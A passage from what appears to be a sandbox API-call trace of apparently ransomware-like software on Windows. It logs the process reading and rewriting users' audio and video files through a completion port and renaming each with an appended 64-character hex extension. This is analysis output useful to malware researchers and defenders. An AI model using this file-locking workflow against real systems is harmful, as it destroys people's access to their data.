returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\QEcAKn3l.mp3.9725BF9F8710E31BEED5C0644E7282337D227915FCA8958095714CBBE3931816" [0164.430] GetProcessHeap () returned 0x270000 [0164.430] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x124) returned 0x425d060 [0164.430] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x422f7bc, FileInformation=0x425d060, Length=0x124, FileInformationClass=0xa) returned 0x0 [0164.433] CloseHandle (hObject=0x594) returned 1 [0164.438] GetProcessHeap () returned 0x270000 [0164.439] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76181a8 | out: hHeap=0x270000) returned 1 [0164.692] RtlInterlockedCompareExchange64 () returned 0x5 [0164.692] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0165.793] WriteFile (in: hFile=0x304, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0165.951] RtlInterlockedCompareExchange64 () returned 0x1 [0165.951] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0165.954] NtQueryObject (in: Handle=0x5a4, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x76900b8, ReturnLength=0x422f7cc) returned 0x0 [0165.956] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\0T2p_sFj5.mp3", lpString2=".413BA5FB2579D6B1090B2F7FDBA6DC633837CA44CB80216AAA79064AE7EA3C3E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\0T2p_sFj5.mp3.413BA5FB2579D6B1090B2F7FDBA6DC633837CA44CB80216AAA79064AE7EA3C3E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\0T2p_sFj5.mp3.413BA5FB2579D6B1090B2F7FDBA6DC633837CA44CB80216AAA79064AE7EA3C3E" [0165.956] GetProcessHeap () returned 0x270000 [0165.956] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x110) returned 0x358390 [0165.956] NtSetInformationFile (FileHandle=0x5a4, IoStatusBlock=0x422f7bc, FileInformation=0x358390, Length=0x110, FileInformationClass=0xa) returned 0x0 [0165.957] CloseHandle (hObject=0x5a4) returned 1 [0165.959] GetProcessHeap () returned 0x270000 [0165.960] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0165.967] RtlInterlockedCompareExchange64 () returned 0x3 [0165.967] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0165.967] NtQueryObject (in: Handle=0x5e4, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x73e00f8, ReturnLength=0x422f7cc) returned 0x0 [0165.968] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\ZTc_iLMq.mp4", lpString2=".0CA4A640051E542412051470AE0EED32476BFC7D32AE243C3DB2C37DE9C0C43A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\ZTc_iLMq.mp4.0CA4A640051E542412051470AE0EED32476BFC7D32AE243C3DB2C37DE9C0C43A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\ZTc_iLMq.mp4.0CA4A640051E542412051470AE0EED32476BFC7D32AE243C3DB2C37DE9C0C43A" [0165.968] GetProcessHeap () returned 0x270000 [0165.969] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11e) returned 0x4276f90 [0165.969] NtSetInformationFile (FileHandle=0x5e4, IoStatusBlock=0x422f7bc, FileInformation=0x4276f90, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0165.970] CloseHandle (hObject=0x5e4) returned 1 [0165.971] GetProcessHeap () returned 0x270000 [0165.973] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0165.974] RtlInterlockedCompareExchange64 () returned 0x2 [0165.974] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.690] ReadFile (in: hFile=0x5a4, lpBuffer=0x746a2f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0) returned 1 [0167.690] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.691] WriteFile (in: hFile=0x5a4, lpBuffer=0x746a2f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0) returned 1 [0167.694] RtlInterlockedCompareExchange64 () returned 0x0 [0167.694] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.703] WriteFile (in: hFile=0x5a4, lpBuffer=0x746a2f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0) returned 1 [0167.709] RtlInterlockedCompareExchange64 () returned 0x0 [0167.709] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.726] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x74c20b8, ReturnLength=0x422f7cc) returned 0x0 [0167.727] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\c2-KpQ.m4a", lpString2=".F8262F9B72D50A41AFE1DC29F0677312EB6884A5844D43F0FDF28195D008FD38" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\c2-KpQ.m4a.F8262F9B72D50A41AFE1DC29F0677312EB6884A5844D43F0FDF28195D008FD38") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\c2-KpQ.m4a.F8262F9B72D50A41AFE1DC29F0677312EB6884A5844D43F0FDF28195D008FD38" [0167.727] GetProcessHeap () returned 0x270000 [0167.727] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x106) returned 0x4267828 [0167.727] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x422f7bc, FileInformation=0x4267828, Length=0x106, FileInformationClass=0xa) returned 0x0 [0167.729] CloseHandle (hObject=0x5ac) returned 1 [0167.730] GetProcessHeap () returned 0x270000 [0167.731] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.731] RtlInterlockedCompareExchange64 () returned 0x1 [0167.731] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.735] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x7e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.735] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.737] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x74c20b8, ReturnLength=0x422f7cc) returned 0x0 [0167.738] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\d0i80.mp3", lpString2=".81A6318977E786A7F07257070140C285F4EAF5063C6F6A940A4CEE8C671CBF5C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\d0i80.mp3.81A6318977E786A7F07257070140C285F4EAF5063C6F6A940A4CEE8C671CBF5C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\d0i80.mp3.81A6318977E786A7F07257070140C285F4EAF5063C6F6A940A4CEE8C671CBF5C" [0167.738] GetProcessHeap () returned 0x270000 [0167.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x104) returned 0x4267940 [0167.738] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x422f7bc, FileInformation=0x4267940, Length=0x104, FileInformationClass=0xa) returned 0x0 [0167.740] CloseHandle (hObject=0x5ac) returned 1 [0167.741] GetProcessHeap () returned 0x270000 [0167.743] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.743] RtlInterlockedCompareExchange64 () returned 0x1 [0167.743] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.747] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x5c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.747] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.749] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x74c20b8, ReturnLength=0x422f7cc) returned 0x0 [0167.750] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\EDgkOwoCzVQ1piLO.wav", lpString2=".BF102A9CA644CCDEF82A950B1B3DA92071C3D4A1004DF9D90C2C1E8AD4822826" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\EDgkOwoCzVQ1piLO.wav.BF102A9CA644CCDEF82A950B1B3DA92071C3D4A1004DF9D90C2C1E8AD4822826") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\EDgkOwoCzVQ1piLO.wav.BF102A9CA644CCDEF82A950B1B3DA92071C3D4A1004DF9D90C2C1E8AD4822826" [0167.750] GetProcessHeap () returned 0x270000 [0167.750] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11a) returned 0x42f98b0 [0167.750] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x422f7bc, FileInformation=0x42f98b0, Length=0x11a, FileInformationClass=0xa) returned 0x0 [0167.751] CloseHandle (hObject=0x5ac) returned 1 [0167.752] GetProcessHeap () returned 0x270000 [0167.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.753] RtlInterlockedCompareExchange64 () returned 0x1 [0167.754] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.757] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.757] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.759] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x74c20b8, ReturnLength=0x422f7cc) returned 0x0 [0167.760] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\HVm1M33x_lC.wav", lpString2=".609D2DAA524E5B55D198F8A5096BAAD78B0CE89B07CF1E2C1704C307851AAE23" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\HVm1M33x_lC.wav.609D2DAA524E5B55D198F8A5096BAAD78B0CE89B07CF1E2C1704C307851AAE23") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\HVm1M33x_lC.wav.609D2DAA524E5B55D198F8A5096BAAD78B0CE89B07CF1E2C1704C307851AAE23" [0167.760] GetProcessHeap () returned 0x270000 [0167.760] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x110) returned 0x4267a58 [0167.760] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x422f7bc, FileInformation=0x4267a58, Length=0x110, FileInformationClass=0xa) returned 0x0 [0167.762] CloseHandle (hObject=0x5ac) returned 1 [0167.763] GetProcessHeap () returned 0x270000 [0167.764] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.764] RtlInterlockedCompareExchange64 () returned 0x1 [0167.764] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.767] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.767] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.769] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x74c20b8, ReturnLength=0x422f7cc) returned 0x0 [0167.770] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\PpOtp7J97-dM4YBP.wav", lpString2=".E5C9C33FF450FF2F4DF82A3CF675319DAE9E7B4BD59826B4ABF5DC716B39C757" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\PpOtp7J97-dM4YBP.wav.E5C9C33FF450FF2F4DF82A3CF675319DAE9E7B4BD59826B4ABF5DC716B39C757") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\PpOtp7J97-dM4YBP.wav.E5C9C33FF450FF2F4DF82A3CF675319DAE9E7B4BD59826B4ABF5DC716B39C757" [0167.770] GetProcessHeap () returned 0x270000 [0167.770] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11a) returned 0x42f99d8 [0167.771] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x422f7bc, FileInformation=0x42f99d8, Length=0x11a, FileInformationClass=0xa) returned 0x0 [0167.776] CloseHandle (hObject=0x5ac) returned 1 [0167.777] GetProcessHeap () returned 0x270000 [0167.779] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.779] RtlInterlockedCompareExchange64 () returned 0x1 [0167.779] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.784] ReadFile (in: hFile=0x5a4, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.785] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.787] NtQueryObject (in: Handle=0x5a4, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x74c20b8, ReturnLength=0x422f7cc) returned 0x0 [0167.788] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\-klD7FnnV0Wcc3teosZX.m4a", lpString2=".4B9730BD836F7B06112DDF6644EC695F1CD9B9ED67B967E61E55191971E95A7F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\-klD7FnnV0Wcc3teosZX.m4a.4B9730BD836F7B06112DDF6644EC695F1CD9B9ED67B967E61E55191971E95A7F") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\-klD7FnnV0Wcc3teosZX.m4a.4B9730BD836F7B06112DDF6644EC695F1CD9B9ED67B967E61E55191971E95A7F" [0167.788] GetProcessHeap () returned 0x270000 [0167.788] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x134) returned 0x4263448 [0167.788] NtSetInformationFile (FileHandle=0x5a4, IoStatusBlock=0x422f7bc, FileInformation=0x4263448, Length=0x134, FileInformationClass=0xa) returned 0x0 [0167.790] CloseHandle (hObject=0x5a4) returned 1 [0167.791] GetProcessHeap () returned 0x270000 [0167.792] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.792] RtlInterlockedCompareExchange64 () returned 0x1 [0167.792] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.796] ReadFile (in: hFile=0x5a4, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.796] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.796] WriteFile (in: hFile=0x5a4, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.797] RtlInterlockedCompareExchange64 () returned 0x0 [0167.798] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.810] NtQueryObject (in: Handle=0x304, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x74c20b8, ReturnLength=0x422f7cc) returned 0x0 [0167.811] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\-ScN6EQhA.mp3", lpString2=".0B40EC970B2793A9062A668F43E3EA32F3D4C910F925141C72FCD32C9853C063" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\-ScN6EQhA.mp3.0B40EC970B2793A9062A668F43E3EA32F3D4C910F925141C72FCD32C9853C063") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\-ScN6EQhA.mp3.0B40EC970B2793A9062A668F43E3EA32F3D4C910F925141C72FCD32C9853C063" [0167.811] GetProcessHeap () returned 0x270000 [0167.811] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x132) returned 0x4263590 [0167.811] NtSetInformationFile (FileHandle=0x304, IoStatusBlock=0x422f7bc, FileInformation=0x4263590, Length=0x132, FileInformationClass=0xa) returned 0x0 [0167.812] CloseHandle (hObject=0x304) returned 1 [0167.813] GetProcessHeap () returned 0x270000 [0167.814] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.814] RtlInterlockedCompareExchange64 () returned 0x1 [0167.815] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.818] ReadFile (in: hFile=0x304, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x5a00, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.818] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.820] NtQueryObject (in: Handle=0x304, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x74c20b8, ReturnLength=0x422f7cc) returned 0x0 [0167.821] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\bZOq0vO.mp3", lpString2=".487DEBE31F42AD12E57C726822887ECBEF881641EF543C2ACD3E963785ECF645" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\bZOq0vO.mp3.487DEBE31F42AD12E57C726822887ECBEF881641EF543C2ACD3E963785ECF645") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\bZOq0vO.mp3.487DEBE31F42AD12E57C726822887ECBEF881641EF543C2ACD3E963785ECF645" [0167.821] GetProcessHeap () returned 0x270000 [0167.821] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12e) returned 0x4332098 [0167.821] NtSetInformationFile (FileHandle=0x304, IoStatusBlock=0x422f7bc, FileInformation=0x4332098, Length=0x12e, FileInformationClass=0xa) returned 0x0 [0167.822] CloseHandle (hObject=0x304) returned 1 [0167.823] GetProcessHeap () returned 0x270000 [0167.824] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.824] RtlInterlockedCompareExchange64 () returned 0x1 [0167.824] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.827] ReadFile (in: hFile=0x304, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.828] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.830] NtQueryObject (in: Handle=0x304, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x74c20b8, ReturnLength=0x422f7cc) returned 0x0 [0167.831] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\JB_KW.m4a", lpString2=".072CCBEC1BE984A01A064F39C2FE8AC1B8455398A7443991CAB0DE2EE3D1D06E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\JB_KW.m4a.072CCBEC1BE984A01A064F39C2FE8AC1B8455398A7443991CAB0DE2EE3D1D06E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\JB_KW.m4a.072CCBEC1BE984A01A064F39C2FE8AC1B8455398A7443991CAB0DE2EE3D1D06E" [0167.831] GetProcessHeap () returned 0x270000 [0167.831] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12a) returned 0x43321d0 [0167.831] NtSetInformationFile (FileHandle=0x304, IoStatusBlock=0x422f7bc, FileInformation=0x43321d0, Length=0x12a, FileInformationClass=0xa) returned 0x0 [0167.833] CloseHandle (hObject=0x304) returned 1 [0167.834] GetProcessHeap () returned 0x270000 [0167.835] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 